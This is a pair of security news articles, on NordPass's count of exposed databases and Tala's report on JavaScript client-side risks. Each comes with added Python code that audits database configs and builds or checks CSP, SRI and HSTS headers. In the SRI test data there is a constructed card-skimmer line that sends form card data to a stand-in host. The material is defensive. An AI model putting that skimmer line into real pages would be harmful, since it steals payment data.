How to protect your website’s database from hackers


A recent investigation by NordPass and a white hat hacker discovered more than 9,000 unsecured databases online with more than 10 billion individual entries.



Website databases contain a treasure trove of confidential information, including usernames, email addresses, phone numbers, and passwords (hashed rather than stored in plaintext, hopefully). Such databases are a tempting target for cybercriminals, who can break into them to steal that information and then easily sell it to fellow criminals on the Dark Web. That is why website databases should be as secure and well protected as possible. But that is not necessarily the reality.


A report released Wednesday by password manager NordPass revealed a total of 9,517 unsecured databases with more than 10.4 billion entries for such data as emails, passwords, and phone numbers.

The research was conducted by NordPass with the aid of a white hat hacker who used publicly available online tools to scan for exposed and unprotected databases from June 2019 to June 2020. Once such databases were uncovered, the hacker was able to connect to them, see what kind of data they held, and share his findings with NordPass.

Looking across 20 countries, China topped the list with more than 3,700 exposed databases and more than 2.6 billion entries. The US came in second with 2,703 unprotected databases and almost 2.4 billion entries made available online. And in third place was India with 520 unsecured databases and 4.8 billion individual entries.

Image: NordPass

With databases left open like this, a cybercriminal does not need much skill at all. Virtually anyone can reach them with publicly available websites and tools: internet-wide search engines such as Censys or Shodan index hosts answering on database ports, so an attacker can browse for open instances instead of probing for them. The hacker working with NordPass searched for exposed Elasticsearch and MongoDB instances. Where administrators never changed the default credentials, or never turned authentication on at all (both products have shipped with authentication disabled by default), reading the data is as simple as connecting.

“In fact, with proper equipment, you could easily scan the whole internet on your own in just 40 minutes,” Chad Hammond, security expert at NordPass, said in a press release.

Some of the accessible databases and the associated data discovered may be in place just for testing purposes, according to NordPass, in which case it would be useless to cybercriminals. But assuming at least some of the data is from actual customers or other users, exposing it would be damaging.

Citing a real-world example of a major database leak, NordPass pointed to the instance from early 2019 in which millions of Facebook records were exposed on a public Amazon cloud server.

In another case from 2019, an unprotected database stored on a Microsoft cloud server exposed the personal information of 80 million US households. The leaked data included addresses, income, and marital status.

And in a third incident, a US rehabilitation clinic suffered a data leak that exposed the personal data of almost 150,000 patients. In this breach, the data wasn’t obtained by any sophisticated hacking method; rather, it was just there in a public database waiting to be leaked.

Just this month, unsecured databases were hit by a “Meow” attack that has already wiped the data from thousands of them. In incidents like these the attacker typically demands a ransom, but Meow simply destroyed the data.

“These kinds of attacks are very frequent,” Hammond said. “Usually, the attacker asks for ransom. This attack seems to be different only because the hackers deleted the data instead of asking for ransom. And while some of the affected databases only contained testing data, the Meow attack targeted some high-level victims, among which was one of the biggest payment platforms in Africa.”

To help organizations better protect and secure their website databases, Hammond offers several thoughts.

First, data security and protection should be a top priority. “Every company, entity, or developer should make sure they never leave any database exposed, as this is obviously a huge threat to user data,” Hammond said.

Data is at risk both in transit and at rest, so it needs protection in both states. Several approaches exist, but encryption is the sound and widely used one for both: TLS on every connection to the database, and encryption of the storage underneath it. All data should be encrypted using trusted, well-reviewed algorithms rather than custom or improvised methods, Hammond stressed. Administrators should also select appropriate key lengths; a strong cipher with a short key, or a homegrown cipher of any key length, protects little.

Identity management is another important factor as it ensures that only the right people in an enterprise have access to certain resources such as a database. Further, businesses should have a security team on hand to take responsibility for vulnerability detection and management, Hammond said.

“Proper protection should include data encryption at rest, wire (in motion) data encryption, identity management, and vulnerability management,” Hammond explained.
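Turning that list into something checkable: the Python below is an added example, not NordPass's tooling or anything from the article. It audits a mongod.conf or elasticsearch.yml for the combination behind the 9,517 exposed databases, a listener on a non-loopback interface with authentication switched off, and, since the same files carry the setting, for connections that are not forced onto TLS. The config snippets are constructed; the option names are the real ones for MongoDB 3.6 or later and Elasticsearch 7.x (assumptions noted in the code), and the parser covers only the key/value subset of YAML those two files use, so it needs no third-party library.

```python
"""Audit MongoDB and Elasticsearch config files for the exposure pattern
described in the article: a listener on a non-loopback interface,
authentication switched off, and no TLS on the wire.

Added example; the config snippets below are constructed, not taken from any
real deployment. Standard library only."""

LOOPBACK = {"127.0.0.1", "::1", "localhost", "_local_"}  # _local_ is Elasticsearch's loopback alias


def parse_simple_yaml(text):
    """Parse the indentation-based 'key: value' subset that mongod.conf and
    elasticsearch.yml use. Assumption: no lists, anchors or multi-line scalars,
    so a full YAML library is not needed."""
    root = {}
    stack = [(-1, root)]  # (indent level, mapping being filled)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # drop comments and trailing space
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, sep, value = line.strip().partition(":")
        if not sep:
            raise ValueError(f"unparseable line: {raw!r}")
        while indent <= stack[-1][0]:           # dedent: close nested mappings
            stack.pop()
        parent = stack[-1][1]
        value = value.strip().strip("'\"")
        if value:
            parent[key] = value
        else:                                   # bare 'key:' opens a nested mapping
            parent[key] = child = {}
            stack.append((indent, child))
    return root


def lookup(cfg, dotted):
    """Resolve 'a.b.c' whether the file nests the keys or writes them flat
    (both spellings are legal in these configs). Returns None if absent."""
    if dotted in cfg:
        return cfg[dotted]
    node = cfg
    for part in dotted.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return None if isinstance(node, dict) else node


def audit_mongod(conf_text):
    """Return (severity, message) findings for a mongod.conf body."""
    cfg = parse_simple_yaml(conf_text)
    # Assumption: mongod 3.6+, which binds only 127.0.0.1 unless told otherwise.
    bind_ips = [ip.strip() for ip in (lookup(cfg, "net.bindIp") or "127.0.0.1").split(",")]
    exposed = lookup(cfg, "net.bindIpAll") == "true" or any(ip not in LOOPBACK for ip in bind_ips)
    findings = []
    if lookup(cfg, "security.authorization") != "enabled":
        findings.append(("CRITICAL" if exposed else "WARN",
                         "security.authorization is not 'enabled': anyone who reaches the port can read and write every collection"))
    if exposed and lookup(cfg, "net.tls.mode") != "requireTLS":
        findings.append(("HIGH", "net.tls.mode is not 'requireTLS': credentials and data cross the network in cleartext"))
    return findings


def audit_elasticsearch(yml_text):
    """Return (severity, message) findings for an elasticsearch.yml body."""
    cfg = parse_simple_yaml(yml_text)
    exposed = (lookup(cfg, "network.host") or "_local_") not in LOOPBACK
    findings = []
    # Assumption: a 7.x node, where security stays off unless enabled explicitly (8.x turns it on by default).
    if lookup(cfg, "xpack.security.enabled") != "true":
        findings.append(("CRITICAL" if exposed else "WARN",
                         "xpack.security.enabled is not true: the REST API answers without credentials"))
    if exposed and lookup(cfg, "xpack.security.http.ssl.enabled") != "true":
        findings.append(("HIGH", "xpack.security.http.ssl.enabled is not true: HTTP traffic to port 9200 is cleartext"))
    return findings


# Constructed sample configs.
WEAK_MONGOD_CONF = """\
net:
  port: 27017
  bindIp: 0.0.0.0          # every interface, including the public one
security:
  authorization: disabled
"""

HARDENED_MONGOD_CONF = """\
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5   # loopback plus the private application network
  tls:
    mode: requireTLS
    certificateKeyFile: /etc/ssl/mongod.pem
security:
  authorization: enabled
"""

WEAK_ELASTICSEARCH_YML = """\
cluster.name: shop-search
network.host: 0.0.0.0
http.port: 9200
xpack.security.enabled: false
"""

if __name__ == "__main__":
    for name, findings in (("weak mongod.conf", audit_mongod(WEAK_MONGOD_CONF)),
                           ("hardened mongod.conf", audit_mongod(HARDENED_MONGOD_CONF)),
                           ("weak elasticsearch.yml", audit_elasticsearch(WEAK_ELASTICSEARCH_YML))):
        print(name, "->", findings or "no findings")
```

Point the audit functions at the real files (for example `audit_mongod(open("/etc/mongod.conf").read())`) as a pre-deployment check. A clean result does not replace looking at what is actually listening (`ss -ltnp` on the host) or scanning your own address space the way the NordPass researcher did: a config file says what the process was told, not what a firewall rule or container port mapping later exposed.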


Major websites plagued by lack of effective security against JavaScript vulnerabilities


Code running on sites can be exploited to steal or leak data via client-side attacks enabled by the programming language, says Tala Security.


JavaScript has become a popular and pervasive programming language that many websites use to build interactive content. But like other widely used technologies, the way sites deploy JavaScript is beset with weaknesses that hackers can exploit to steal sensitive online data. A report released Tuesday by security provider Tala Security maintains that most major websites are ill-equipped to combat these flaws, putting their customer and user data at risk.


For its “2020 Global Data at Risk State of the Web Report,” Tala analyzed the security defenses of the top 1,000 websites as ranked by Alexa. This list includes major sites such as Google, YouTube, Baidu, Facebook, Yahoo, Amazon, Zoom, Netflix, and Microsoft. Citing a “troubling lack of security controls required to prevent data theft,” the report said that these sites are vulnerable to client-side attacks that exploit JavaScript vulnerabilities, including Magecart, formjacking, cross-site scripting, and credit card skimming.

The risk from JavaScript exploitation is higher in 2020 as the average website now includes content from 22 different third-party JavaScript vendors, up slightly from the level seen in 2019. Some 58% of the content that appears in a user’s browser is delivered by these third-party JavaScript integrations.

The interactive forms found on 92% of the analyzed websites expose data to on average 17 different domains. This data includes personally identifiable information (PII), login credentials, card transactions, and medical records. Based on Tala’s analysis, this data is exposed to 10 times more domains than intended, one reason Magecart, formjacking, and card skimming attacks are able to continue.

Some 99% of websites globally include multiple client-side vulnerabilities, making them attractive targets for attackers.

Image: Tala Security

Though Magecart attacks often capture the most attention, no form of attack is more pervasive than cross-site scripting (XSS). A full 97% of the websites examined use dangerous JavaScript functions, sinks such as innerHTML, document.write and eval that turn an attacker-controlled string into markup or code, which could open the door to a DOM-based XSS attack. Though standards-based security controls could prevent these attacks, such controls are not applied consistently or frequently enough, according to Tala.

“JavaScript powers today’s rich, highly customized web experience and enables digital transformation across all industry sectors,” Tala Security founder and CEO Aanand Krishnan said in a press release. “The fact that it remains largely unguarded is both surprising and disappointing. Websites generate massive volumes of high-value data, making them a primary target for attackers. The fundamental issue with the way today’s websites are secured is that user data is greatly exposed to third-party applications and services and that data leakage is occurring even from trusted third-party resources.”

How can websites better guard against data theft and leakage due to JavaScript vulnerabilities? Tala recommends that site developers implement controls such as Content Security Policy (CSP), which restricts the origins a page may load scripts from and submit forms to; Subresource Integrity (SRI), which pins a third-party script to the hash of a reviewed copy so the browser refuses a tampered version; and HTTP Strict Transport Security (HSTS), which forces HTTPS so scripts cannot be altered in transit. All three mitigate JavaScript-based client-side attacks.

“Standards-based security controls are built-into all modern browsers and are designed specifically to address the vulnerabilities created by modern web architecture, including client-side attacks,” Tala said in its report. “Applied and managed correctly, these security standards, including Content Security Policy (CSP), Subresource Integrity (SRI), and others [such as HTTP Strict Transport Security (HSTS)] will mitigate client-side risk, including zero-day threats, offering a future-proof solution with no impact to website performance or user experience.  Leveraging tools that complement these capabilities by monitoring and preventing PII and other data leakage provides a comprehensive defense-in-depth approach.”
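What those three controls look like when generated and checked on the server side, as an added example that is not from Tala's report or its products: the Python below builds a CSP header, audits a header value for the settings that still let a skimmer run (inline scripts, wildcard or scheme-only sources, missing base-uri and form-action), computes and verifies SRI values the way a browser does, and carries an HSTS value. The policy, the vendor script body, the skimmer line appended to it and the cdn.example.com hostname are all constructed for the example.

```python
"""Generate and check the browser-enforced controls Tala recommends: a
Content-Security-Policy header, Subresource Integrity for third-party scripts,
and HTTP Strict Transport Security. Added example; the policy, script bodies
and hostnames are constructed, not taken from the report or any real site."""
import base64
import hashlib

# Source expressions in script-src that defeat the point of having a policy.
WEAK_SCRIPT_SOURCES = {"'unsafe-inline'", "'unsafe-eval'", "*", "http:", "https:", "data:"}


def build_csp(policy):
    """Serialize {directive: [source expressions]} into a header value."""
    return "; ".join(f"{directive} {' '.join(sources)}" for directive, sources in policy.items())


def audit_csp(header):
    """Report the gaps in a CSP header value that still let injected or third-party code run or exfiltrate."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    findings = []
    script = directives.get("script-src", directives.get("default-src"))
    if script is None:
        findings.append("no script-src (or default-src fallback): scripts may load from anywhere")
    else:
        findings += [f"script-src allows {bad}" for bad in sorted(WEAK_SCRIPT_SOURCES & set(script))]
    # object-src falls back to default-src; base-uri and form-action do not.
    if "object-src" not in directives and directives.get("default-src") != ["'none'"]:
        findings.append("object-src missing: plugin content can run under the page's origin")
    if "base-uri" not in directives:
        findings.append("base-uri missing: an injected <base> tag can redirect relative script URLs")
    if "form-action" not in directives:
        findings.append("form-action missing: a formjacked form can submit to any origin")
    return findings


def sri_integrity(content, algo="sha384"):
    """Subresource Integrity value ('<algo>-<base64 digest>') for a script body."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content, integrity):
    """Replicate the browser's check: the fetched body must match one of the listed
    hashes or the script is refused. This is what catches a tampered CDN copy."""
    return any(sri_integrity(content, value.partition("-")[0]) == value for value in integrity.split())


def script_tag(src, content):
    """<script> tag pinning a third-party script to the hash of the reviewed copy."""
    return f'<script src="{src}" integrity="{sri_integrity(content)}" crossorigin="anonymous"></script>'


HARDENED_POLICY = {
    "default-src": ["'self'"],
    "script-src": ["'self'", "https://cdn.example.com"],  # one named vendor host, not a scheme wildcard
    "object-src": ["'none'"],
    "base-uri": ["'self'"],
    "form-action": ["'self'"],
    "frame-ancestors": ["'none'"],
}
HSTS_HEADER = "max-age=63072000; includeSubDomains"  # two years; add 'preload' once the domain is submitted to the preload list

# Constructed: the vendor script as reviewed, and a copy a skimmer has appended itself to.
REVIEWED_SCRIPT = b"window.vendorCheckout = function (form) { /* constructed vendor code */ };\n"
TAMPERED_SCRIPT = REVIEWED_SCRIPT + b"new Image().src = 'https://skimmer.example/?c=' + document.forms[0].card.value;\n"

WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:"

if __name__ == "__main__":
    print("weak policy findings:", audit_csp(WEAK_CSP))
    hardened = build_csp(HARDENED_POLICY)
    print("hardened header:", hardened, "->", audit_csp(hardened) or "no findings")
    print(script_tag("https://cdn.example.com/checkout.js", REVIEWED_SCRIPT))
    print("tampered copy accepted?", sri_matches(TAMPERED_SCRIPT, sri_integrity(REVIEWED_SCRIPT)))
```

The SRI half is the useful part for the third-party problem the report measures: the integrity value is computed from the copy of the vendor script you reviewed, and a CDN copy that later grows a skimmer line no longer matches, so the browser drops it instead of running it. SRI only works for scripts you can pin, though; a vendor that changes its script continuously must be allowed by hostname in `script-src` instead, which is why the audit treats a bare `https:` source as a finding.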
